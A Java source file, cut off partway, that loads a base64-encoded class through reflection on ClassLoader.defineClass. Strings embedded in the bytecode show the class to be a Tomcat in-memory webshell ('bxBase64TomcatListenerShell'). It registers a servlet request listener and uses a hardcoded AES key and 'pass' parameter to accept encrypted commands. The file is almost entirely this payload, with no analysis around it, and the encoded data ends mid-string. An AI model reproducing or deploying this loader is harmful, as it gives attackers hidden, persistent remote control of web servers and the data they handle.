import java.io.*;
import java.util.Arrays;
import java.util.Base64;
import java.lang.reflect.Method;
import java.lang.reflect.InvocationTargetException;
class Main {
public static void main(String[] args) throws InvocationTargetException,IOException,InstantiationException,IllegalAccessException,NoSuchMethodException {
try{
java.lang.reflect.Method method = java.lang.ClassLoader.class.getDeclaredMethod("defineClass", new Class[] { byte[].class, int.class, int.class });
method.setAccessible(true);
byte[] arrayOfByte = (new sun.misc.BASE64Decoder()).decodeBuffer("yv66vgAAADICAwoAkwEqCAErCQCNASwIAS0JAI0BLgoAkwEvCQCNATAJAI0BMQgBMgoAEAEzBwE0CAE1BwE2CgE3ATgKATcBOQcBOgoBOwE8CgCNAT0HAT4HAT8KABQBLwkAIAFACgAQAUEKABQBQgkAIQFACQAiAUAJACMBQAkAJAFACQAlAUAJACYBQAkAJwFABwFDBwFEBwFFBwFGBwFHBwFIBwFJBwFKBwFLCAFMCgCNAU0IAU4KAI0BTwgBUAcBUQsALgFSCgAUAVMKABQBVAoATgFVCgAoAVYKAVcBWAoAIAFZCgAUAVoKACABWwoAIAFcBwFdCgA5AS8KABABXgoBXwFgCgA5AVMKABABYQcBYgoAOQFjBwDACgA/AWQKAD8BZQoAPwFmCgAQAWcKABABaAoBaQFqCgFpAWsKAI0BbAgBbQcA4AgBbgcBbwcBcAoBVwFxCgCNAXIKAD8BcwsATQFCCAF0CgAQAXUKAXYBZAoBdgF3CgF2AUEIAXgKAI0BeQoAOQFCBwD6CgCNAXoKABABewoAEAF8CAEDCgCNAX0IAQcIAX4KAX8BgAcBgQoAKAGCCgBkAYMKAX8BhAoBfwGFCAGGCgGHAYgKACgBiQoBhwGKBwGLCgGHAYwKAG0BjQoAbQGOCgAoAY8IAZAIAZEIAZIHAQ4IAZMKABABlAgBlQgBlggBlwgBmAgBmQgBmgoAjQGbCAGcCgAoAZ0KAI0BnggBnwgBoAoAKAGhCAElCAEfCAEgBwGiCgCIAS8KAIgBowgBpAoAjQGlBwGmCgCNASoKAI0BpwoATgFWCgBOAS8KAI0BLwcBqAcBqQEAC2luaXRpYWxpemVkAQABWgEABGxvY2sBABJMamF2YS9sYW5nL09iamVjdDsBAANrZXkBABJMamF2YS9sYW5nL1N0cmluZzsBAAhwYXNzd29yZAEABjxpbml0PgEAGihMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAB1MYnhCYXNlNjRUb21jYXRMaXN0ZW5lclNoZWxsOwEABmxvYWRlcgEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQADKClWAQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAG3NlcnZsZXRSZXF1ZXN0TGlzdGVuZXJDbGFzcwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQANU3RhY2tNYXBUYWJsZQcBpgcBcAcBOgcBNAcBNgcBPgEAE2dldFN0YW5kYXJkQ29udGV4dHMBABUoKVtMamF2YS9sYW5nL09iamVjdDsBAApjb250ZXh0TWFwAQAPTGphdmEvdXRpbC9NYXA7AQAIY29udGV4dHMBABNMamF2YS91dGlsL0hhc2hTZXQ7AQAJYmxhY2tUeXBlAQADb2JqAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAJ0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL1N0cmluZzs+OwcBPwEACkV4Y2VwdGlvbnMBAAxzZWFyY2hPYmplY3QBAGAoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvdXRpbC9IYXNoU2V0O0xqYXZhL3V0aWwvSGFzaFNldDtJSSlMamF2YS9sYW5nL09iamVjdDsBAAdmaWVsZHMxAQAaW0xqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAFqAQABSQEACWFycmF5U2l6ZQEAA3JldAEACmZpZWxkVmFsdWUBAAlmaWVsZFR5cGUBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAFpAQAGZmllbGRzAQALZmllbGRzQXJyYXkBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAhvYmpDbGFzcwEABGhhc2gBABNMamF2YS9sYW5nL0ludGVnZXI7AQAPdGFyZ2V0Q2xhc3NOYW1lAQAGb2JqZWN0AQAJYmxhY2tsaXN0AQAIbWF4RGV0Y2gBAAxjdXJyZW50RGV0Y2gBADBMamF2YS91dGlsL0FycmF5TGlzdDxMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7PjsBAChMamF2YS91dGlsL0hhc2hTZXQ8TGphdmEvbGFuZy9JbnRlZ2VyOz47BwFLBwFDBwFdBwFiAQAJU2lnbmF0dXJlAQCJKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL3V0aWwvSGFzaFNldDxMamF2YS9sYW5nL0ludGVnZXI7PjtMamF2YS91dGlsL0hhc2hTZXQ8TGphdmEvbGFuZy9TdHJpbmc7PjtJSSlMamF2YS9sYW5nL09iamVjdDsBAAthZGRMaXN0ZW5lcgEAFShMamF2YS9sYW5nL09iamVjdDspWgEAEm5ld0xpc3RlbmVyT2JqZWN0cwEAE1tMamF2YS9sYW5nL09iamVjdDsBACFhZGRBcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJNZXRob2QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAD3N0YW5kYXJkQ29udGV4dAEAD2xpc3RlbmVyT2JqZWN0cwEADGxpc3RlbmVyTGlzdAEAEExqYXZhL3V0aWwvTGlzdDsBAAhsaXN0ZW5lcgEAEHN0YW5kYXJkQ29udGV4dHMBAARpc09rBwFvAQAGaW52b2tlAQBTKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABNzZXJ2bGV0UmVxdWVzdEV2ZW50AQAFcHJveHkBAAZtZXRob2QBAARhcmdzAQAMaW52b2tlTWV0aG9kAQBLKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQACbzEBAAdjbGFzc2VzAQAKbWV0aG9kTmFtZQEACnBhcmFtZXRlcnMBABBnZXRNZXRob2RCeUNsYXNzAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQACY3MBABJbTGphdmEvbGFuZy9DbGFzczsHAaoBAAhnZXRGaWVsZAEAPyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEACWZpZWxkTmFtZQEABWNsYXp6AQANZ2V0RmllbGRWYWx1ZQEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQABZgEADGdldFBhcmFtZXRlcgEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQANcmVxdWVzdE9iamVjdAEABG5hbWUBAA5nZXRDb250ZW50VHlwZQEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9TdHJpbmc7AQADYWVzAQAHKFtCWilbQgEAAWMBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAFzAQACW0IBAAFtBwGrAQADbWQ1AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQACYnMBAAV2YWx1ZQEADGJhc2U2NERlY29kZQEAFihMamF2YS9sYW5nL1N0cmluZzspW0IBAAdkZWNvZGVyAQADcnVuAQAVKExqYXZhL2xhbmcvT2JqZWN0OylWAQAIcmVzcG9uc2UBAAdzZXNzaW9uAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAAWsBAAJwYwEAC2NvbnRlbnRUeXBlAQAHcmVxdWVzdAEAOUxqYXZhL3V0aWwvSGFzaE1hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEAIGJ4QmFzZTY0VG9tY2F0TGlzdGVuZXJTaGVsbC5qYXZhDACcAJ0BABAzYzZlMGI4YTljMTUyMjRhDACZAJoBAARwYXNzDACbAJoMAJwApQwAlwCYDACVAJYBACZqYWthcnRhLnNlcnZsZXQuU2VydmxldFJlcXVlc3RMaXN0ZW5lcgwBrAGtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAJGphdmF4LnNlcnZsZXQuU2VydmxldFJlcXVlc3RMaXN0ZW5lcgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwGuDAGvAbAMAbEBsgEAD2phdmEvbGFuZy9DbGFzcwcBswwBtAG1DADdAN4BABNqYXZhL2xhbmcvVGhyb3dhYmxlAQARamF2YS91dGlsL0hhc2hTZXQMAbYAqQwBtwG4DAG5AN4BABFqYXZhL2xhbmcvSW50ZWdlcgEAD2phdmEvbGFuZy9TaG9ydAEADmphdmEvbGFuZy9Mb25nAQAQamF2YS9sYW5nL0RvdWJsZQEADmphdmEvbGFuZy9CeXRlAQAPamF2YS9sYW5nL0Zsb2F0AQATamF2YS9sYW5nL0NoYXJhY3RlcgEAEWphdmEvbGFuZy9Cb29sZWFuAQAQamF2YS9sYW5nL1N0cmluZwEAKG9yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5TdGFuZGFyZENvbnRleHQMAL0AvgEABnBhcmVudAwBAAEBAQAIY2hpbGRyZW4BAA1qYXZhL3V0aWwvTWFwDAG6AbsMAbwBvQwBvgCyDAG/AcAMAcEA3gcBwgwBwwHEDAHFAcYMAccA3gwByAHJDACcAcoBABNqYXZhL3V0aWwvQXJyYXlMaXN0DAHLAcwHAc0MAc4BzwwB0AHAAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQMAb4B0QwB0gHTDAHUAcAMAdUB1gwB1wHYDAHZAcAHAdoMAdsBxAwB1QHcDACxALIBACBhcHBsaWNhdGlvbkV2ZW50TGlzdGVuZXJzT2JqZWN0cwEAHWFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcnNMaXN0AQAOamF2YS91dGlsL0xpc3QBABBqYXZhL2xhbmcvT2JqZWN0DAHdAd4MAPwA/QwB3wHgAQAbYWRkQXBwbGljYXRpb25FdmVudExpc3RlbmVyDAHhAeIHAaoMAOsB4wEAEnJlcXVlc3RJbml0aWFsaXplZAwBHQEeDAD3APgMAeQB4gwB5QHmDADxAPIBAANBRVMHAasMAecB6AEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMAekB6gwAnAHrDAHsAe0MAe4B7wEAA01ENQcB8AwB5wHxDAHyAckMAfMB9AEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAH1AeoMAJwB9gwB9wH4DAH5AbgBABBqYXZhLnV0aWwuQmFzZTY0AQAKZ2V0RW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWc3VuLm1pc2MuQkFTRTY0RW5jb2RlcgwB+gH7AQAGZW5jb2RlAQAKZ2V0RGVjb2RlcgEABmRlY29kZQEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIBAAxkZWNvZGVCdWZmZXIBABFnZXRTZXJ2bGV0UmVxdWVzdAwBBwEIAQAhYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDAHHAfwMAQMBBAEAFmRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCwBAAAMAf0B/gEAEWphdmEvdXRpbC9IYXNoTWFwDAH/AgABABAwZThlZTY0N2Q0NDFmNDdiDAEaARsBABtieEJhc2U2NFRvbWNhdExpc3RlbmVyU2hlbGwMAgECAgEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgEAI2phdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YXgvY3J5cHRvL0NpcGhlcgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABdqYXZhL2xhbmcvcmVmbGVjdC9Qcm94eQEAEG5ld1Byb3h5SW5zdGFuY2UBAGIoTGphdmEvbGFuZy9DbGFzc0xvYWRlcjtbTGphdmEvbGFuZy9DbGFzcztMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7KUxqYXZhL2xhbmcvT2JqZWN0OwEABFRZUEUBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAANhZGQBAAZ2YWx1ZXMBABgoKUxqYXZhL3V0aWwvQ29sbGVjdGlvbjsBAAZhZGRBbGwBABkoTGphdmEvdXRpbC9Db2xsZWN0aW9uOylaAQAHdG9BcnJheQEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEABmVxdWFscwEAEGphdmEvbGFuZy9TeXN0ZW0BABBpZGVudGl0eUhhc2hDb2RlAQAVKExqYXZhL2xhbmcvT2JqZWN0OylJAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAhjb250YWlucwEACGludFZhbHVlAQADKClJAQAEKEkpVgEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAEGphdmEvdXRpbC9BcnJheXMBAAZhc0xpc3QBACUoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS91dGlsL0xpc3Q7AQANZ2V0U3VwZXJjbGFzcwEAKChbTGphdmEvbGFuZy9PYmplY3Q7KVtMamF2YS9sYW5nL09iamVjdDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAB2dldFR5cGUBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzQXJyYXkBAAMoKVoBABBnZXRDb21wb25lbnRUeXBlAQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAlhcnJheWNvcHkBACooTGphdmEvbGFuZy9PYmplY3Q7SUxqYXZhL2xhbmcvT2JqZWN0O0lJKVYBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRNZXRob2QBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQALZ2V0SW5zdGFuY2UBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEACGdldEJ5dGVzAQAEKClbQgEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAEaW5pdAEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQAH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